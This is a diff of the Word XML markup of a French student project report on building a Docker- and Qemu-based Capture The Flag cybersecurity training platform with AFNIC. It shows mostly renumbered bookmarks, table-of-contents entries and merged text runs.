               <w:lang w:eastAsia="fr-FR"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc509930332" w:history="1">
+          <w:hyperlink w:anchor="_Toc509996610" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Lienhypertexte"/>
@@ -2449,7 +2414,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc509930332 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc509996610 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2469,7 +2434,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2492,7 +2457,7 @@
               <w:lang w:eastAsia="fr-FR"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc509930333" w:history="1">
+          <w:hyperlink w:anchor="_Toc509996611" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Lienhypertexte"/>
@@ -2519,7 +2484,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc509930333 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc509996611 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2539,7 +2504,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2562,7 +2527,7 @@
               <w:lang w:eastAsia="fr-FR"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc509930334" w:history="1">
+          <w:hyperlink w:anchor="_Toc509996612" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Lienhypertexte"/>
@@ -2589,7 +2554,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc509930334 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc509996612 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2609,7 +2574,179 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TM2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="fr-FR"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc509996613" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Lienhypertexte"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>a)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Lienhypertexte"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Trello et Gantt Project</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc509996613 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TM2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="fr-FR"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc509996614" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Lienhypertexte"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>b)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Lienhypertexte"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Documentation technique des failles</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc509996614 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2632,63 +2769,6 @@
               <w:lang w:eastAsia="fr-FR"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc509930335" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Lienhypertexte"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Documentation technique des failles</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc509930335 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
         </w:p>
         <w:p>
           <w:r>
@@ -2711,7 +2791,7 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc509930312"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc509996590"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">I)  </w:t>
@@ -2719,18 +2799,18 @@
       <w:r>
         <w:t>Introduction</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre2"/>
         <w:ind w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc509930313"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc509996591"/>
       <w:r>
         <w:t>1) Présentation des parties prenantes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2742,14 +2822,14 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="2" w:name="_Toc509930314"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc509996592"/>
       <w:r>
         <w:t xml:space="preserve">a) </w:t>
       </w:r>
       <w:r>
         <w:t>L’AFNIC</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -2763,63 +2843,7 @@
         <w:t>oopération</w:t>
       </w:r>
       <w:r>
-        <w:t>) est une association loi de 1901. Elle a pour mission de gérer les domaines Internet nationaux de premier niveau de France (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), La Réunion (.re), Terres australes et antarctiques françaises (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), Mayotte (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>yt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), Saint-Pierre-et-Miquelon (.pm) et Wallis-et-Futuna (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>). L'</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Afnic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> se définit également comme fournisseur de solutions techniques et de services de registre, elle est notamment le partenaire technique de nouveaux domaines génériques dont le .paris, le .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bzh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, le .alsace, le .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ovh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>) est une association loi de 1901. Elle a pour mission de gérer les domaines Internet nationaux de premier niveau de France (.fr), La Réunion (.re), Terres australes et antarctiques françaises (.tf), Mayotte (.yt), Saint-Pierre-et-Miquelon (.pm) et Wallis-et-Futuna (.wf). L'Afnic se définit également comme fournisseur de solutions techniques et de services de registre, elle est notamment le partenaire technique de nouveaux domaines génériques dont le .paris, le .bzh, le .alsace, le .ovh.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2893,7 +2917,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print">
+                    <a:blip r:embed="rId14" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2926,23 +2950,7 @@
         </w:drawing>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>source</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wikipedia</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (source : Wikipedia)</w:t>
       </w:r>
       <w:r>
         <w:tab/>
@@ -2962,11 +2970,11 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc509930315"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc509996593"/>
       <w:r>
         <w:t>b) Le CFI</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3027,7 +3035,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3071,11 +3079,11 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="4" w:name="_Toc509930316"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc509996594"/>
       <w:r>
         <w:t>c) L’équipe</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3099,7 +3107,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3132,11 +3140,11 @@
         <w:pStyle w:val="Titre2"/>
         <w:ind w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc509930317"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc509996595"/>
       <w:r>
         <w:t>2) Présentation du projet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -3144,15 +3152,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Dans le cadre de notre diplôme de Manager des Systèmes Informatiques parcours </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SiiC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, en partenariat avec l’AFNIC, nous avons pour mission de réaliser une plateforme de type CTF (Capture The Flag) pour l’entraînement à la cyber-sécurité.</w:t>
+        <w:t>Dans le cadre de notre diplôme de Manager des Systèmes Informatiques parcours SiiC, en partenariat avec l’AFNIC, nous avons pour mission de réaliser une plateforme de type CTF (Capture The Flag) pour l’entraînement à la cyber-sécurité.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3186,12 +3186,12 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc509930318"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc509996596"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>a) Problématique</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3232,11 +3232,11 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc509930319"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc509996597"/>
       <w:r>
         <w:t>b) Besoins et objectifs</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3397,11 +3397,11 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc509930320"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc509996598"/>
       <w:r>
         <w:t>c) Moyens disponibles</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3473,15 +3473,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>Nom de domaine public « .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> »</w:t>
+        <w:t>Nom de domaine public « .fr »</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3518,12 +3510,12 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc509930321"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc509996599"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>II) Développement</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3533,11 +3525,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc509930322"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc509996600"/>
       <w:r>
         <w:t>Etude des besoins</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3547,11 +3539,11 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc509930323"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc509996601"/>
       <w:r>
         <w:t>Etude de la solution de virtualisation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="12"/>
       <w:r>
         <w:t> </w:t>
       </w:r>
@@ -3650,15 +3642,7 @@
         <w:t>Notre choix s’est donc porté sur la solution proposée par Docker. Docker nous permet de créer des containers applicatifs</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> sous linux. Et </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Qemu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (KVM) pour les autres types de machines</w:t>
+        <w:t xml:space="preserve"> sous linux. Et Qemu (KVM) pour les autres types de machines</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3671,11 +3655,11 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc509930324"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc509996602"/>
       <w:r>
         <w:t>Etude de la solution des « failles » et scénarios</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3690,23 +3674,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Pour cela nous nous sommes appuyés sur une fonctionnalité de Docker, en utilisant des </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Dockerfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> qui permettent la création automatique des containers applicatifs. Avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Qemu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> nous utilisons une ligne de commande pour lancer une machine virtuelle.</w:t>
+        <w:t>Pour cela nous nous sommes appuyés sur une fonctionnalité de Docker, en utilisant des Dockerfile qui permettent la création automatique des containers applicatifs. Avec Qemu nous utilisons une ligne de commande pour lancer une machine virtuelle.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3737,12 +3705,12 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc509930325"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc509996603"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Diagramme de cas d’utilisation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3756,6 +3724,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBDAFA4" wp14:editId="4107E06C">
@@ -3771,7 +3740,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId17">
                       <a:clrChange>
                         <a:clrFrom>
                           <a:srgbClr val="FFFFFF"/>
@@ -3812,11 +3781,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc509930326"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc509996604"/>
       <w:r>
         <w:t>Management du projet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3826,11 +3795,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc509930327"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc509996605"/>
       <w:r>
         <w:t>Organisationnel</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3911,11 +3880,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc509930328"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc509996606"/>
       <w:r>
         <w:t>Relationnel</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3962,11 +3931,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc509930329"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc509996607"/>
       <w:r>
         <w:t>Etude des risques</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -5758,14 +5727,9 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>Re-spécifier</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> et valider avec le corps enseignant </w:t>
+              <w:t xml:space="preserve">Re-spécifier et valider avec le corps enseignant </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5827,6 +5791,7 @@
               </w:rPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t>Difficultés techniques</w:t>
             </w:r>
           </w:p>
@@ -6818,13 +6783,8 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Debug</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> en binôme </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Debug en binôme </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7081,11 +7041,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc509930330"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc509996608"/>
       <w:r>
         <w:t>Contraintes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7216,12 +7176,12 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc509930331"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc509996609"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Etude du marché</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7239,11 +7199,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc509930332"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc509996610"/>
       <w:r>
         <w:t>Description de la solution utilisée</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7260,6 +7220,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160B52CC" wp14:editId="4B741056">
@@ -7279,7 +7240,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7313,14 +7274,27 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> Schéma réseau détaillé de la solution</w:t>
       </w:r>
@@ -7381,11 +7355,9 @@
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Php</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7410,15 +7382,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>Bootstrap (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>css</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>Bootstrap (css)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7430,13 +7394,8 @@
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Fontawesome</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (icônes)</w:t>
+      <w:r>
+        <w:t>Fontawesome (icônes)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7444,12 +7403,12 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc509930333"/>
